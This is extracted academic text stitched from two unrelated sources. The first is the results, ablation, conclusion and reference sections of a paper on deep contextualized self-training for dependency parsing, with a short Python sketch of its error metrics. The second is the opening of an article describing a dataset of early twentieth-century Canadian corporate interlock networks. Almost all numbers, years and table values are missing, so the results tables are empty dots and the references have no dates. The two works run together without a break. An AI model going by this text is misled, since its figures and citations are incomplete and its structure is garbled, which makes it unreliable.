dcst-lm is also consistently outperformed by dcst-rpe, dcst- dr and dcst-nc that consider only one syntactic annotation scheme, except from a few english lightly supervised cases where it outperforms dcst-nc by a very small margin. syntactic self-supervision hence provides better means of exploiting the unlabeled data, compared with the standard language modeling alternative. another question is whether the bilstm mod- els should be trained at all. indeed, in recent papers untrained lstms with random weights downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://nlp.stanford.edu/data/glove. b. d.zip http://nlp.stanford.edu/data/glove. b. d.zip https://fasttext.cc/docs/en/crawl-vectors.html https://fasttext.cc/docs/en/crawl-vectors.html bc bn mz pt tc wb model las las las las las las base . . . . . . base+rg . . . . . . dcst-lm . . . . . . self-training . . . . . . cvt . . . . . . dcst-ens . . . . . . base-fs . . . . . . table : unsupervised domain adaptation ontonotes results. base-fs is an upper bound. cs fictree cs pdt gl ctg gl treegal it isdt it postwita ro nonstandard ro rrt sv lines sv talbanken model las las las las las las las las las las base . . . . . . . . . . base+rg . . . . . . . . . . dcst-lm . . . . . . . . . . self-training . . . . . . . . . . cvt . . . . . . . . . . dcst-ens . . . . . . . . . . base-fs . . . . . . . . . . table : unsupervised domain adaptation ud results. base-fs is an upper bound. substantially enhanced model performance (zhang and bowman, ; tenney et al., ; wang et al., ; wieting and kiela, ). our results lead to two conclusions. firstly, base+rg, the model that is identical to the syntactically trained dcst except that the biaffine parser is integrated with a randomly initialized bilstm through our gating mechanism, is consistently outperformed by all our syntactically self-trained dcst models, with very few exceptions. secondly, in line with the conclusions of the aforementioned papers, base+rg is one of the strongest baselines in our experiments. perhaps most importantly, in most experiments this model outperforms the base parser—indicating the positive impact of the randomly initialized representation models. moreover, it is the strongest baseline in english domain adaptation setups and in of languages in the lightly supervised multilingual experiments (considering the uas measure), and is the second-best baseline in out of english lightly supervised setups (again considering the uas measure). the growing evidence for the positive impact of such randomly initialized models should motivate further investigation of the mechanism that underlies their success. finally, our results demonstrate the limited power of traditional self-training: in english domain adaptation it harms or does not improve the base parser; in multilingual domain adaptation it is the best model in cases; and it is the best baseline in of the english lightly supervised setups and in of the multilingual lightly supervised setups. this supports our motivation to propose an improved self-training framework. ablation analysis and discussion impact of training set size figure presents the impact of the dcst-ens method on the biaffine parser, in the lightly supervised english setups, as a function of the labeled training set size of the parser. clearly, the positive impact is substantially stronger for smaller training sets. 
particularly, when the parser is trained with sentences (the green bar) the improvement is higher than uas points in of cases, among which in (nw and wb) it is higher than uas points. for training sentences the performance gap drops to – uas points, and for training sentences it is – points. this pattern is in line with previous literature on the impact of training methods designed for the lightly supervised setup, and particularly for self- training when applied to constituency parsing (reichart and rappoport, ). we note that many studies failed to improve dependency parsing with traditional self-training even for very downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : uas gap between dcst-ens and the base parser, as a function of the training set size ( / / ), across ontonotes domains. small training set sizes (rush et al., ). we also note that syntactically self-trained dcst consistently improves the biaffine parser in our domain adaptation experiments, although the entire training set of the news (nw) section of ontonotes is used for training. impact of self-training quality we next aim to test the connection between the accuracy of the self-trained sequence taggers and the quality of the biaffine parser when integrated with the bilstm encoders of these taggers. ideally, we would expect that the higher the quality of the bilstm, the more positive its impact on the parser. this would indicate that the improvement we see with the dcst models indeed results from the information encoded in the self-trained taggers. to test this hypothesis, figure plots, for each of the bilstm taggers considered in this paper, the sentence-level accuracy scores of the tagger when applied to the ontonotes test sets vs. the las scores of the biaffine parser that was integrated with the corresponding bilstm, when that parser was applied to the same test sentences. in such a plot, if the regression line that fits the points has an r-squared (r ) value of , this indicates a positive linear relation between the self-trained tagger and the parser quality. the resulting r values are well aligned with the relative quality of the dcst models. particularly, dcst-lm, the least efficient method where the tagger is trained as a language model rather than on a syntactic signal, has an r of . . dcst-dr and dcst-nc, which are the next in terms of parsing quality (table ), have r values figure : auxiliary task accuracy scores of each bilstm tagger vs. the las score of the biaffine parser when integrated with that bilstm. the bilstm scores are computed on the test sets and reflect the capability of the bilstm that was trained on unlabeled data with syntactic signal extracted from the base parser’s trees (or as a language model for dcst-lm) to properly tag the test sentences. the points correspond to sentence scores across all ontonotes . test sets, and the heat map presents the frequency of each point. of . and . , respectively, although dcst-dr performs slightly better. finally, dcst-rpe, the best performing model among the four in all cases but two, has an r value of . . these results provide a positive indication of the hypothesis that the improved parsing quality is caused by the representation model and is not a mere artifact. tagging scheme quality analysis we next aim to shed more light on the quality of the tagging schemes with which we train our bilstm taggers. 
we perform an error analysis on the parse trees produced by the final hybrid parser (figure ), when each of the schemes is used in the bilstm tagger training step during the lightly supervised setups. the metrics we compute correspond to the three tagging schemes, and our goal is to examine whether each of the self-trained representation models (bilstms) improves the capability of the final parser to capture the information encoded in its tagging scheme. particularly, we consider four metrics: absolute difference of number of children (ad-nc): the absolute difference between the number of children a word has in the gold tree and the corresponding number in the predicted tree; absolute difference of distance from the root (ad-dr): the absolute difference between the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april model ad-nc ad-dr ad-pdh pos head error ontonotes base . . . . dcst-nc . . . . dcst-dr . . . . dcst-rpe . . . . dcst-ens . . . . ud base . . . . dcst-nc . . . . dcst-dr . . . . dcst-rpe . . . . dcst-ens . . . . table : tagging scheme error analysis. model uas las base . . dcst-lm . . self-training . . cvt . . dcst-ens . . table : sentence length adaptation results. distance of a word from the root in the gold tree and the corresponding distance in the predicted tree; absolute difference of positional distance from the head (ad-pdh): the absolute difference between the positional distance of a word from its head word according to the gold tree and the corresponding number according to the predicted tree (kiperwasser and ballesteros, ) (we count the words that separate the head from the modifier in the sentence, considering the distance negative if the word is to the right of its head); and pos head error: an indicator function which returns if the pos tag of the head word of a given word according to the gold tree is identical to the corresponding pos tag in the predicted tree, and otherwise. for all the metrics we report the mean value across all words in our test sets. the values of ad-nc, ad-dr, and ad-pdh are hence in the [ , m] range, where m is the length of the longest sentence in the corpus. the values of the pos head error are in the [ , ] range. for all metrics lower values indicate that the relevant information has been better captured by the final hybrid parser. table presents a comparison between the base parser to our dcst algorithms. all in all, the dcst models outperform the base parser across all comparisons, with dcst-ens being the best model in all cases except from one. the analysis indicates that in some cases a bilstm tagger with a given tagging scheme directly improves the capability of the final parser to capture the corresponding information. for example, dcst- dr, whose tagging scheme considers the distance of each word from the root of the tree, performs best (ontonotes) or second best (ud) on the ad- dr metric compared to all other models except for the dcst-ens model that contains the dcst- dr model as a component. likewise, dcst-rpe, which encodes information about the pos tag of the head word for every word in the sentence, is the best performing model in terms of pos head error. 
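the four diagnostics above can be computed directly from gold and predicted head indices plus pos tags. the sketch below is one possible reading of the definitions, with two simplifications that are my own rather than the paper's: ad-pdh is computed from signed index offsets instead of counts of separating words, and the pos head error is implemented as a mismatch rate so that lower values are better.

```python
def depths(heads):
    """heads[i] = head of word i+1 (0 = root); distance of each word from the root."""
    def one(i):
        d = 1
        while heads[i - 1] != 0:
            i = heads[i - 1]
            d += 1
        return d
    return [one(i + 1) for i in range(len(heads))]

def error_metrics(gold_heads, pred_heads, pos):
    n = len(gold_heads)
    children = lambda hs, i: sum(1 for h in hs if h == i + 1)
    # AD-NC: |#children in gold tree - #children in predicted tree|, averaged
    ad_nc = sum(abs(children(gold_heads, i) - children(pred_heads, i))
                for i in range(n)) / n
    # AD-DR: |distance from root in gold tree - in predicted tree|, averaged
    gd, pd = depths(gold_heads), depths(pred_heads)
    ad_dr = sum(abs(g - p) for g, p in zip(gd, pd)) / n
    # AD-PDH (simplified): |signed offset to gold head - signed offset to predicted head|
    ad_pdh = sum(abs((g - (i + 1)) - (p - (i + 1)))
                 for i, (g, p) in enumerate(zip(gold_heads, pred_heads))) / n
    # POS head error, as a mismatch rate between gold-head and predicted-head POS
    head_pos = lambda h: "ROOT" if h == 0 else pos[h - 1]
    pos_err = sum(1 for g, p in zip(gold_heads, pred_heads)
                  if head_pos(g) != head_pos(p)) / n
    return ad_nc, ad_dr, ad_pdh, pos_err

gold = [2, 0, 2, 5, 2]
pred = [2, 0, 5, 5, 2]
pos  = ["DET", "NOUN", "VERB", "DET", "NOUN"]
print(error_metrics(gold, pred, pos))   # (0.4, 0.2, 0.6, 0.0)
```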
in contrast to the relative success of dcst-rpe and dcst-dr in improving specific capabilities of the parser, dcst-nc, our weakest model across experimental setups, is also the weakest dcst model in this error analysis, even when considering the ad-nc metric that measures success in predicting the number of children a word has in the tree. sentence length adaptation we next aim to test whether dcst can enhance a parser trained on short sentences so that it can better parse long sentences. dependency parsers perform better on short sentences, and we would expect self-training to bring in high-quality syntactic information from automatically parsed long sentences. for this aim, we replicate the ontonotes wb in-domain experiment, except that we train the parser on all training set sentences of up to words, use the training set sentences with more than words as unlabeled data for sequence tagger training (algorithm , step ), and test the final parser on all test sentences with more than words. table shows that dcst-ens improves the base parser in this setup by . uas and las points. dcst-lm achieves only a marginal uas improvement while cvt substantially harms the parser. this result further supports the value of our methods and encourages future research in various under-resourced setups. elmo embeddings finally, we turn to invest- igate the impact of deep contextualized word em- beddings, such as elmo (peters et al., ), on the base parser and on the dcst-ens model. to this end, we replace the glove/fasttext word embeddings from our original experiments with downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april bc bn mz nw pt tc wb model uas las uas las uas las uas las uas las uas las uas las base+elmo . . . . . . . . . . . . . . base+elmo+g . . . . . . . . . . . . . . dcst-ens+elmo . . . . . . . . . . . . . . table : lightly supervised ontonotes results with elmo embeddings. cu da fa id lv sl sv tr ur vi model uas las uas las uas las uas las uas las uas las uas las uas las uas las uas las base+elmo . . . . . . . . . . . . . . . . . . . . base+elmo+g . . . . . . . . . . . . . . . . . . . . dcst-ens+elmo . . . . . . . . . . . . . . . . . . . . table : lightly supervised ud results with elmo embeddings. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the multilingual elmo word embeddings of che et al. ( ). we follow che et al. ( ) and define the elmo word embedding for word i as: wi = w elmo · ∑ j= h elmo i,j , where w elmo is a trainable parameter and helmoi,j is the hidden representation for word i in the j’th bilstm layer of the elmo model, which remains fixed throughout all experiments. we experiment with three models: base + elmo: the biaffine parser fed by the elmo word embeddings and trained on the labeled training data; base + elmo + gating (g): the biaffine parser fed by our original word embeddings, and elmo word embeddings are integrated through our gating mechanism. training is done on the labeled training data only; and dcst-ens + elmo: our ensemble parser where the bilstm taggers and the base parser are fed by the elmo word embeddings. tables (ontonotes) and (ud) summarize the results in the lightly supervised setups with training sentences. as in previous experiments, dcst-ens+elmo is the best performing model in both setups. although base+elmo+g is superior in the cu and tr (las) setups, it is inferior in all ontonotes domains. 
note also that dcst-ens+elmo improves the uas results of dcst-ens from tables and on all ontonotes domains and on out of ud languages. conclusions we proposed a new self-training framework for dependency parsing. our dcst approach is based on the integration of (a) contextualized em- bedding model(s) into a neural dependency parser, where the embedding models are trained on word tagging schemes extracted from the trees generated by the base parser on unlabeled data. in multilingual lightly supervised and domain adaptation experiments, our models consistently outperform strong baselines and previous models. in future work we intend to explore improved word tagging schemes, sequence tagging archi- tectures, and integration mechanisms. we shall also consider cross-language learning where the lexical gap between languages should be overcome. acknowledgments we would like to thank the action editor and the reviewers, as well as the members of the ie@technion nlp group for their valuable feedback and advice. this research was partially funded by an isf personal grant no. / . references steven abney. . understanding the yarowsky algorithm. computational linguistics, ( ): – . gabor angeli, melvin jose johnson premkumar, and christopher d. manning. . leveraging linguistic structure for open domain information extraction. in proceedings of acl. mikel artetxe, gorka labaka, and eneko agirre. . a robust self-learning method for fully unsupervised cross-lingual mappings of word embeddings. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . melbourne. avrim blum and tom mitchell. . combining labeled and unlabeled data with co-training. in proceedings of the eleventh annual conference on computational learning theory, pages – . wanxiang che, yijia liu, yuxuan wang, bo zheng, and ting liu. . towards better ud parsing: deep contextualized word em- beddings, ensemble, and treebank concatena- tion. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . wenliang chen, youzheng wu, and hitoshi isahara. . learning reliable information for dependency parsing adaptation. in proceedings of the nd international conference on com- putational linguistics-volume , pages – . wenliang chen, yue zhang, and min zhang. . feature embedding for dependency parsing. in proceedings of coling , the th international conference on computational linguistics: technical papers, pages – . kevin clark, minh-thang luong, christopher d. manning, and quoc v. le. . semi- supervised sequence modeling with cross-view training. in proceedings of the conference on empirical methods in natural language processing, pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april djork-arné clevert, thomas unterthiner, and sepp hochreiter. . fast and accurate deep network learning by exponential linear units (elus). in th international conference on learning representations, iclr , san juan, puerto rico, conference track proceedings. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. timothy dozat and christopher d. manning. . 
deep biaffine attention for neural dependency parsing. in th international conference on learning representations, iclr , toulon, france, conference track proceedings. rotem dror, gili baumer, segev shlomov, and roi reichart. . the hitchhikers guide to testing statistical significance in natural language processing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , melbourne. jack edmonds. . optimum branchings. journal of research of the national bureau of standards b, ( ): – . dan goldwasser, roi reichart, james clarke, and dan roth. . confidence driven un- supervised semantic parsing. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – . edouard grave, piotr bojanowski, prakhar gupta, armand joulin, and tomas mikolov. . learning word vectors for languages. in proceedings of the international conference on language resources and evaluation (lrec ). christian hadiwinoto and hwee tou ng. . a dependency-based neural reordering model for statistical machine translation. in thirty-first aaai conference on artificial intelligence. yulan he and deyu zhou. . self-training from labeled features for sentiment analysis. information processing & management, ( ): – . daniel hershcovich, omri abend, and ari rappoport. . a transition-based directed acyclic graph parser for ucca. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the human language technology conference of the naacl, companion volume: short papers. kenji imamura and eiichiro sumita. . nict self-training approach to neural machine translation at nmt- . in proceedings of the nd workshop on neural machine translation and generation, pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of iclr. eliyahu kiperwasser and miguel ballesteros. . scheduled multi-task learning: from syntax to translation. transactions of the association for computational linguistics, : – . eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing using bidirectional lstm feature represen- tations. transactions of the association for computational linguistics, : – . omer levy and yoav goldberg. . dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . xuezhe ma, zecong hu, jingzhou liu, nanyun peng, graham neubig, and eduard hovy. . stack-pointer networks for dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april diego marcheggiani, anton frolov, and ivan titov. . a simple and accurate syntax-agnostic neural model for dependency-based semantic role labeling. in proceedings of conll. bryan mccann, james bradbury, caiming xiong, and richard socher. . learned in translation: contextualized word vectors. in advances in neural information processing systems, pages – . david mcclosky, eugene charniak, and mark johnson. a. effective self-training for parsing. 
in proceedings of the main conference on human language technology conference of the north american chapter of the association of computational linguistics, pages – . david mcclosky, eugene charniak, and mark johnson. b. reranking and self-training for parser adaptation. in proceedings of the st international conference on computational linguistics and the th annual meeting of the association for computational linguistics, pages – . david mcclosky, eugene charniak, and mark johnson. . automatic domain adaptation for parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . ryan mcdonald, joakim nivre, yvonne quirmbach-brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency annotation for multilingual parsing. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . rada mihalcea. . co-training and self- training for word sense disambiguation. in proceedings of the eighth conference on computational natural language learning (conll- ) at hlt-naacl . joakim nivre, mitchell abrams, željko agić, lars ahrenberg, lene antonsen, maria jesus aranzabe, gashaw arutie, masayuki asahara, luma ateyah, mohammed attia, aitziber atutxa, liesbeth augustinus, elena badmaeva, miguel ballesteros, esha banerjee, sebastian bank, verginica barbu mititelu, john bauer, sandra bellato, kepa bengoetxea, riyaz ahmad bhat, erica biagetti, eckhard bick, rogier blokland, victoria bobicev, carl börstell, cristina bosco, gosse bouma, sam bowman, adriane boyd, aljoscha burchardt, marie candito, bernard caron, gauthier caron, gülşen cebiroğlu eryiğit, giuseppe g. a. 
celano, savas cetin, fabricio chalub, jinho choi, yongseok cho, jayeol chun, silvie cinková, aurélie collomb, çağrı çöltekin, miriam connor, marine courtin, elizabeth davidson, marie-catherine marneffe, valeria paiva, arantza ilarraza, carly dickerson, peter dirix, kaja dobrovoljc, timothy dozat, kira droganova, puneet dwivedi, marhaba eli, ali elkahky, binyam ephrem, tomaž erjavec, aline etienne, richárd farkas, hector fernandez alcalde, jennifer foster, cláudia freitas, katarı́na gajdošová, daniel galbraith, marcos garcia, moa gärdenfors, kim gerdes, filip ginter, iakes goenaga, koldo gojenola, memduh gökırmak, yoav goldberg, xavier gómez guinovart, berta gonzáles saavedra, matias grioni, normunds grūzı̄tis, bruno guillaume, céline guillot-barbance, nizar habash, jan hajič, jan hajič jr., linh hà mỹ, na-rae han, kim harris, dag haug, barbora hladká, jaroslava hlaváčová, florinel hociung, petter hohle, jena hwang, radu ion, elena irimia, tomáš jelı́nek, anders johannsen, fredrik jørgensen, hüner kaşıkara, sylvain kahane, hiroshi kanayama, jenna kanerva, tolga kayadelen, václava kettnerová, jesse kirchner, natalia kotsyba, simon krek, sookyoung kwak, veronika laippala, lorenzo lambertino, tatiana lando, septina dian larasati, alexei lavrentiev, john lee, phu%o%ng lêhò̂ng, alessandro lenci, saran lertpradit, herman leung, cheuk ying li, josie li, keying li, kyungtae lim, nikola ljubešić, olga loginova, olga lyashevskaya, teresa lynn, vivien macketanz, aibek makazhanov, michael mandl, christopher manning, ruli manurung, cătălina mărănduc, david mareček, katrin marheinecke, hector martinez alonso, andré martins, jan mašek, yuji matsumoto, ryan mcdonald, gustavo mendonça, niko miekka, anna missilä, cătălin mititelu, yusuke miyao, simonetta montemagni, amir more, laura downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april moreno romero, shinsuke mori, bjartur mortensen, bohdan moskalevskyi, kadri muischnek, yugo murawaki, kaili müürisep, pinkey nainwani, juan ignacio navarro horñiacek, anna nedoluzhko, gunta nešpore- bērzkalne, lu%o%ng nguyẽ̂n thi, huyè̂n nguyẽ̂n thi minh, vitaly nikolaev, rattima nitisaroj, hanna nurmi, stina ojala, adédayò. 
olúòkun, mai omura, petya osenova, robert östling, lilja Øvrelid, niko partanen, elena pascual, marco passarotti, agnieszka patejuk, siyao peng, cenel-augusto perez, guy perrier, slav petrov, jussi piitulainen, emily pitler, barbara plank,thierry poibeau, martin popel, lauma pretkalniņa, sophie prévost, prokopis prokopidis, adam przepiórkowski, tiina puolakainen, sampo pyysalo, andriela rääbis, alexandre rademaker, loganathan ramasamy, taraka rama, carlos ramisch, vinit ravishankar, livy real, siva reddy, georg rehm, michael rießler, larissa rinaldi, laura rituma, luisa rocha, mykhailo romanenko, rudolf rosa, davide rovati, valentin roşca, olga rudina, shoval sadde, shadi saleh, tanja samardžić, stephanie samson, manuela sanguinetti, baiba saulı̄te, yanin sawanakunanon, nathan schneider, sebastian schuster, djamé seddah, wolfgang seeker, mojgan seraji, mo shen, atsuko shimada, muh shohibussirri, dmitry sichinava, natalia silveira, maria simi, radu simionescu, katalin simkó, mária šimková, kiril simov, aaron smith, isabela soares- bastos, antonio stella, milan straka, jana strnadová, alane suhr, umut sulubacak, zsolt szántó, dima taji, yuta takahashi, takaaki tanaka, isabelle tellier, trond trosterud, anna trukhina, reut tsarfaty, francis tyers sumire uematsu, zdeňka urešová, larraitz uria, hans uszkoreit, sowmya vajjala, daniel niekerk, gertjan noord, viktor varga, veronika vincze, lars wallin, jonathan north washington, seyi williams, mats wirén, tsegay woldemariam, tak-sum wong, chunxiao yan, marat m. yavrumyan, zhuoran yu, zdeněk žabokrtský, amir zeldes, daniel zeman, manying zhang, and hanzhi zhu. . universal dependencies . . joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. manning, ryan mcdonald, slav petrov, sampo pyysalo, natalia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in lrec. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep contextualized word representations. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. barbara plank and željko agić. . distant supervision from disparate sources for low- resource part-of-speech tagging. in proceedings of the conference on empirical methods in natural language processing, pages – , brussels. barbara plank and gertjan van noord. . effective measures of domain similarity for parsing. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies- volume , pages – . roi reichart and ari rappoport. . self- training for enhancement and domain adaptation of statistical parsers trained on small datasets. in proceedings of the th annual meeting of the association of computational linguistics, pages – . sebastian ruder and barbara plank. . strong baselines for neural semi-supervised learning under domain shift. in the th annual meeting of the association for computational linguisticsmeeting of the association for computational linguistics. alexander m. rush, roi reichart, michael collins, and amir globerson. . 
improved parsing and pos tagging using inter-sentence consistency constraints. in proceedings of the joint conference on empirical downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april methods in natural language processing and computational natural language learning, pages – . piotr rybak and alina wróblewska. . semi- supervised neural system for tagging, parsing and lematization. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . motoki sato, hitoshi manabe, hiroshi noji, and yuji matsumoto. . adversarial training for cross-domain universal dependency parsing. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . ehsan shareghi, yingzhen li, yi zhu, roi reichart, and anna korhonen. . bayesian learning for neural dependency parsing. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – . anders søgaard. . simple semi-supervised training of part-of-speech taggers. in proceedings of the acl conference short papers, pages – . drahomı́ra spoustová and miroslav spousta. . dependency parsing as a sequence labeling task. prague bulletin of mathematical linguistics, : – . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning research, ( ): – . mark steedman, miles osborne, anoop sarkar, stephen clark, rebecca hwa, julia hockenmaier, paul ruhlen, steven baker, and jeremiah crim. . bootstrapping statistical parsers from small datasets. in proceedings of the tenth conference on european chapter of the association for computational linguistics- volume , pages – . michalina strzyz, david vilares, and carlos gómez-rodrıguez. . viable dependency parsing as sequence labeling. in proceedings of naacl-hlt , pages – . ian tenney, patrick xia, berlin chen, alex wang, adam poliak, r. thomas mccoy, najoung kim, benjamin van durme, samuel r. bowman, dipanjan das, and ellie pavlick. . what do you learn from context? probing for sentence structure in contextualized word representations. in proceedings of iclr. kristina toutanova, xi victoria lin, wen- tau yih, hoifung poon, and chris quirk. . compositional learning of embeddings for relation paths in knowledge base and text. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, ĺukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . oriol vinyals, ĺukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in advances in neural information processing systems, pages – . alex wang, jan hula, patrick xia, raghavendra pappagari, r. thomas mccoy, roma patel, najoung kim, ian tenney, yinghui huang, katherin yu, shuning jin, berlin chen, benjamin van durme, edouard grave, ellie pavlick, and samuel r. bowman. . can you tell me how to get past sesame street? sentence-level pretraining beyond language modeling. in proceedings of the th conference of the association for computational linguistics, pages – . john wieting and douwe kiela. . 
no train- ing required: exploring random encoders for sentence classification. in proceedings of iclr. vikas yadav and steven bethard. . a survey on recent advances in named entity recognition from deep learning models. in proceedings of the th international conference on computational linguistics, pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april david yarowsky. . unsupervised word sense disambiguation rivaling supervised methods. in rd annual meeting of the association for computational linguistics. kelly w. zhang and samuel r. bowman. . language modeling teaches you more than translation does: lessons learned through auxiliary syntactic task analysis. in proceedings of the emnlp workshop blackboxnlp: analyzing and interpreting neural networks for nlp, pages – , brussels. xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in advances in neural infor- mation processing systems, pages – . zhi-hua zhou and ming li. . tri-training: exploiting unlabeled data using three classi- fiers. ieee transactions on knowledge & data engineering, ( ): – . yftah ziser and roi reichart. . pivot based language modeling for improved neural domain adaptation. in proceedings of the conference of the north american chapter of the association for computational lin- guistics: human language technologies, volume (long papers), pages – , new orleans, la. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction previous work background: the biaffine parser deep contextualized self-training representation learning (steps and ) the final hybrid parser (step ) evaluation setups experiments results ablation analysis and discussion conclusions © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- - networks of canadian business elites: historical corporate interlock networks circa abstract this paper provides details about a historical dataset of canadian corporations and business elites who served on corporate boards circa . the source of this corporate interlock data is the directory of directors in canada, , a public domain volume listing canadi- an public companies in canada. because these data are thought to be of interest not only to network researchers, but also to business historians and management scholars, an attempt has been made to make the data as easy to use as possible. supplementary information has also been added to the network files provided. all of the individu- als and companies in the dataset have been geolocated. the proper census division a company was located in has also been add- ed so that the networks can be combined with other publicly availa- ble data from the period. two sets of graph files are provided in csv format with other formats provided on the author’s website. the first file contains corporations as the nodes with directors as edges. the second file has the individual directors as nodes and edges connect- ing them are corporate boards individuals both sat on. keywords corporate interlock network, canadian business elites, business history. the dataset presented in this paper offers a unique view into the relationships of business elites in canada in the early part of the last century. 
canadian business was marked by the existence of powerful families that occupied the boards of many corporations. also pres- ent, but less common, were more widely held firms with more entrepreneurial owners. at that time, ca- nadians considered themselves very much a part of the british empire. the major financial and business centers at the time were montreal and toronto. al- though, the mid-western city of winnipeg was a rapidly growing regional center as well. this dataset allows for the identification of major corporations and the ties that exist between them through corporate directors. the coverage in the data presented here is the complete volume of the direc- tory of directors in canada published in canada by w.r. houston ( ). the entire volume is now public domain and available for download (at https://archive. org/details/directorydirector housuoft). houston had close ties to the toronto stock exchange that only grew over time. for example, his offices were originally located nearby the exchange, but eventually they were relocated to the exchange itself (murphy, ). in the sections that follow, i will outline the details of the graph and associated data that were collect- ed. the data that this paper describes are available as two different network projections. the first is a graph describing the relationships between firms as nodes, with directors as edges relating these organizations. the other file describes the network of individuals that served on the boards of the firms. in this file, the nodes represent people and the edges are the boards that they have common membership on. both are projec- tions of the same data for ease of use by those less fa- miliar with network visualization and analysis software. jon mackay waterloo institute for complexity and innovation (wici), the university of waterloo, waterloo, canada. e-mail: jon.mackay@gmail.com. networks of canadian business elites: historical corporate interlock networks circa the format and contents of the corporate graph file the format of the files provided with this paper is comma separated value (csv) format. this is a plain text format that is usable in spreadsheets and most network visualization and analysis programs. the data files are also available on the author’s website (http:// jgmackay.com) in other file formats, including graph exchange format (gexf), which is an open graph format supported by many popular network analysis software packages. this standard was developed by the gephi consortium and supported by gephi net- work visualization software, which is freely available (bastian et al., ). the gexf file format has been designed to be open and work with a variety of soft- ware packages. information about attributes table lists the attributes of nodes and edges that exist in the graph files and includes a brief explana- tion of the attribute. weights the edges in the graphs are weighted to represent whether nodes are joined by one or more edges. for example, in the graph, where the companies are the nodes, two companies may have a tie be- tween them with a weight greater than one if there are multiple directors that sit on both corporate boards. spatial information in addition to the names of the companies in the dod, some additional information has been added. first, the address of each company has been parsed from the dod and broken down into more useful compo- nents. in this graph, each firm has a city and province attribute for its location. 
i have used this information to geolocate each firm, so there are additional fields for latitude and longitude. using a mapping layout that accepts latitude and longitude pairs, a user can easily visualize the locations of corporations or directors on a map of one's choosing. (i suggest gephi as a network visualization tool.) most companies and individuals are located in canada. however, the data show directors located in the uk and europe and some companies located in south america. finally, i have also linked the geographical location of companies to the canadian census data files. the field uid_cd_ contains the unique identification number for the census division numbers in the census files. map files composed of the appropriate gis shapefiles should be available from library archives canada or from the canadian government's open data initiative website. it should be noted that corporations listed in the files are, for the most part, public firms. the dod also contains some information about regional chambers of commerce and other organizations.

table . attributes in graph files.
node attribute field: meaning (field present in)
city: city where the firm is located (company, person)
company: name of the company (company, person)
cprov: the letter province code used in the canadian census (company)
initials: person's initials (person)
lastname: family last name (person)
latitude: location information (company, person)
longitude: location information (company, person)
prov: province where the firm is located (company, person)
uid_cd_ : unique regional identifier field in the canadian census (company)

the format and contents of the person graph file
the graph file containing corporate executives and directors from the dod has the firms as edges and the nodes as people. this file contains location data (longitude and latitude pairs) for both individuals and the firms they worked for. additionally, there is information about the province and city each individual was located in. perhaps of most interest for historians of the period are the fields with the full names of individuals. this allows researchers to construct sociograms of the elites of canadian business of the day. additional historical background and information about regional elites based on this data is also available (mackay, ).

limitations
